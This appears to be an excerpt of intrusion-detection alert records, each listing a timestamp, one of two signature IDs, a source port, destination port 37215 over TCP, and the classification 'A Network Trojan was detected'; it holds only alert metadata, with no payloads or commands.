          Timestamp:06/08/24-15:05:18.822276
          SID:2835222
          Source Port:34554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354989
          SID:2829579
          Source Port:46064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356731
          SID:2829579
          Source Port:42196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152778
          SID:2835222
          Source Port:46654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.794917
          SID:2829579
          Source Port:56814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468224
          SID:2835222
          Source Port:43046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547905
          SID:2835222
          Source Port:56716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598638
          SID:2835222
          Source Port:48872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155974
          SID:2829579
          Source Port:47052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108032
          SID:2835222
          Source Port:37818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257296
          SID:2829579
          Source Port:43868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128717
          SID:2835222
          Source Port:36170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444604
          SID:2835222
          Source Port:40606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517569
          SID:2835222
          Source Port:49556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817526
          SID:2835222
          Source Port:54866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238196
          SID:2835222
          Source Port:39192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819193
          SID:2829579
          Source Port:57638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602831
          SID:2829579
          Source Port:51008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548722
          SID:2835222
          Source Port:56832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396940
          SID:2829579
          Source Port:42476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.828031
          SID:2835222
          Source Port:48748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352672
          SID:2829579
          Source Port:60986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861443
          SID:2829579
          Source Port:38560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511363
          SID:2835222
          Source Port:34900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017048
          SID:2829579
          Source Port:54978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707814
          SID:2829579
          Source Port:37264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788936
          SID:2835222
          Source Port:37550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042089
          SID:2835222
          Source Port:35882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857003
          SID:2835222
          Source Port:56032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743812
          SID:2829579
          Source Port:47450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731835
          SID:2829579
          Source Port:46776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113816
          SID:2829579
          Source Port:41772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112570
          SID:2829579
          Source Port:42766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740694
          SID:2829579
          Source Port:46972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901801
          SID:2835222
          Source Port:38020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551703
          SID:2835222
          Source Port:56970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517317
          SID:2829579
          Source Port:43000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782261
          SID:2835222
          Source Port:38556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509667
          SID:2835222
          Source Port:57184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704973
          SID:2835222
          Source Port:34398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788784
          SID:2835222
          Source Port:51446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109394
          SID:2835222
          Source Port:56594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462838
          SID:2829579
          Source Port:58760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081717
          SID:2835222
          Source Port:48680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275685
          SID:2829579
          Source Port:59876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787955
          SID:2829579
          Source Port:43486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239889
          SID:2835222
          Source Port:33076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161457
          SID:2829579
          Source Port:37160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741031
          SID:2835222
          Source Port:47282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017892
          SID:2835222
          Source Port:35406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791924
          SID:2829579
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884189
          SID:2835222
          Source Port:56406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354715
          SID:2829579
          Source Port:56804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258072
          SID:2829579
          Source Port:34888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743932
          SID:2829579
          Source Port:42868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844147
          SID:2835222
          Source Port:46954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462128
          SID:2829579
          Source Port:34458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824196
          SID:2829579
          Source Port:45366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.863165
          SID:2829579
          Source Port:59174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.034961
          SID:2829579
          Source Port:57468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844019
          SID:2835222
          Source Port:60774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.814188
          SID:2835222
          Source Port:39834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177526
          SID:2829579
          Source Port:48792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912500
          SID:2835222
          Source Port:45380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191591
          SID:2829579
          Source Port:58616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708476
          SID:2835222
          Source Port:36310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471419
          SID:2829579
          Source Port:48226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546523
          SID:2829579
          Source Port:49398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158983
          SID:2829579
          Source Port:40638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044844
          SID:2829579
          Source Port:33326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158770
          SID:2829579
          Source Port:33544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747722
          SID:2835222
          Source Port:53120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599870
          SID:2829579
          Source Port:47904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859575
          SID:2829579
          Source Port:40520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170711
          SID:2835222
          Source Port:45578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.450045
          SID:2829579
          Source Port:51944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800248
          SID:2835222
          Source Port:49296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463838
          SID:2829579
          Source Port:50854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748017
          SID:2829579
          Source Port:45302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352310
          SID:2829579
          Source Port:46500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164294
          SID:2835222
          Source Port:41188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150805
          SID:2835222
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601942
          SID:2829579
          Source Port:49254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800468
          SID:2829579
          Source Port:51024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786444
          SID:2835222
          Source Port:59638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857648
          SID:2835222
          Source Port:42130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351468
          SID:2829579
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896670
          SID:2835222
          Source Port:54360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554364
          SID:2835222
          Source Port:59862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898003
          SID:2829579
          Source Port:34086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732233
          SID:2835222
          Source Port:47286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267795
          SID:2829579
          Source Port:35466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176113
          SID:2835222
          Source Port:42166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815430
          SID:2835222
          Source Port:37068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059303
          SID:2835222
          Source Port:33374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276260
          SID:2829579
          Source Port:52256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446293
          SID:2835222
          Source Port:51304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747786
          SID:2829579
          Source Port:57574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730303
          SID:2829579
          Source Port:50938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671654
          SID:2829579
          Source Port:57984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394997
          SID:2835222
          Source Port:55600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306517
          SID:2835222
          Source Port:43252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512047
          SID:2829579
          Source Port:59422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155608
          SID:2829579
          Source Port:46674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732364
          SID:2829579
          Source Port:32786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667083
          SID:2835222
          Source Port:50574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.676229
          SID:2835222
          Source Port:48892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408650
          SID:2835222
          Source Port:50602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673004
          SID:2829579
          Source Port:47250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036526
          SID:2829579
          Source Port:37356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132093
          SID:2829579
          Source Port:43782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107174
          SID:2829579
          Source Port:55406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271487
          SID:2835222
          Source Port:43738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179104
          SID:2829579
          Source Port:52994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.119077
          SID:2829579
          Source Port:52058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706934
          SID:2829579
          Source Port:56746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805110
          SID:2829579
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113939
          SID:2835222
          Source Port:59794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512367
          SID:2829579
          Source Port:41368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893550
          SID:2829579
          Source Port:42656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151227
          SID:2835222
          Source Port:40294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604778
          SID:2835222
          Source Port:34920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446656
          SID:2829579
          Source Port:60746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706535
          SID:2835222
          Source Port:36956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732815
          SID:2829579
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602329
          SID:2829579
          Source Port:50698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019547
          SID:2829579
          Source Port:49842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603260
          SID:2829579
          Source Port:35480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354827
          SID:2835222
          Source Port:57464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239315
          SID:2835222
          Source Port:51820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795132
          SID:2829579
          Source Port:59874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509030
          SID:2829579
          Source Port:43764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513903
          SID:2829579
          Source Port:48992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020259
          SID:2835222
          Source Port:32816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602045
          SID:2835222
          Source Port:39108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259984
          SID:2829579
          Source Port:57434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542398
          SID:2829579
          Source Port:58902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748001
          SID:2829579
          Source Port:56186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107881
          SID:2835222
          Source Port:34740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462633
          SID:2835222
          Source Port:49182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604287
          SID:2829579
          Source Port:33830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299641
          SID:2829579
          Source Port:57110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403501
          SID:2829579
          Source Port:34882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890413
          SID:2829579
          Source Port:37528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272267
          SID:2829579
          Source Port:46992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549271
          SID:2835222
          Source Port:53978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042068
          SID:2829579
          Source Port:60818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402319
          SID:2835222
          Source Port:52162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894732
          SID:2829579
          Source Port:34668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513310
          SID:2835222
          Source Port:32990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820690
          SID:2835222
          Source Port:45100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897618
          SID:2829579
          Source Port:35246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152567
          SID:2835222
          Source Port:36782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447229
          SID:2835222
          Source Port:48498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055422
          SID:2835222
          Source Port:33936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736994
          SID:2829579
          Source Port:46640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017286
          SID:2829579
          Source Port:39736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236762
          SID:2829579
          Source Port:45816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464770
          SID:2829579
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806677
          SID:2835222
          Source Port:44848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732041
          SID:2835222
          Source Port:41226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035552
          SID:2835222
          Source Port:45452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239964
          SID:2835222
          Source Port:46202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273464
          SID:2829579
          Source Port:47894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463452
          SID:2835222
          Source Port:48088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111081
          SID:2835222
          Source Port:32976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667594
          SID:2835222
          Source Port:60710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015904
          SID:2835222
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395374
          SID:2835222
          Source Port:60660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180468
          SID:2835222
          Source Port:43894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545478
          SID:2829579
          Source Port:46630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159414
          SID:2829579
          Source Port:57930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157712
          SID:2829579
          Source Port:45084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855306
          SID:2829579
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742791
          SID:2829579
          Source Port:48978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081623
          SID:2829579
          Source Port:53432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017968
          SID:2829579
          Source Port:58618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707542
          SID:2835222
          Source Port:36496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740637
          SID:2835222
          Source Port:35154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514476
          SID:2829579
          Source Port:45582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163220
          SID:2835222
          Source Port:48316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158478
          SID:2835222
          Source Port:58626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109395
          SID:2835222
          Source Port:51636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891058
          SID:2829579
          Source Port:50004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783629
          SID:2829579
          Source Port:58176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019648
          SID:2829579
          Source Port:46234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663678
          SID:2829579
          Source Port:38252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509079
          SID:2835222
          Source Port:38214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356169
          SID:2829579
          Source Port:45790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599993
          SID:2829579
          Source Port:42480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087929
          SID:2829579
          Source Port:34392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022167
          SID:2835222
          Source Port:53376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354016
          SID:2829579
          Source Port:38642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743987
          SID:2835222
          Source Port:36196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510896
          SID:2835222
          Source Port:45792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510244
          SID:2829579
          Source Port:49514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191959
          SID:2829579
          Source Port:54780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020595
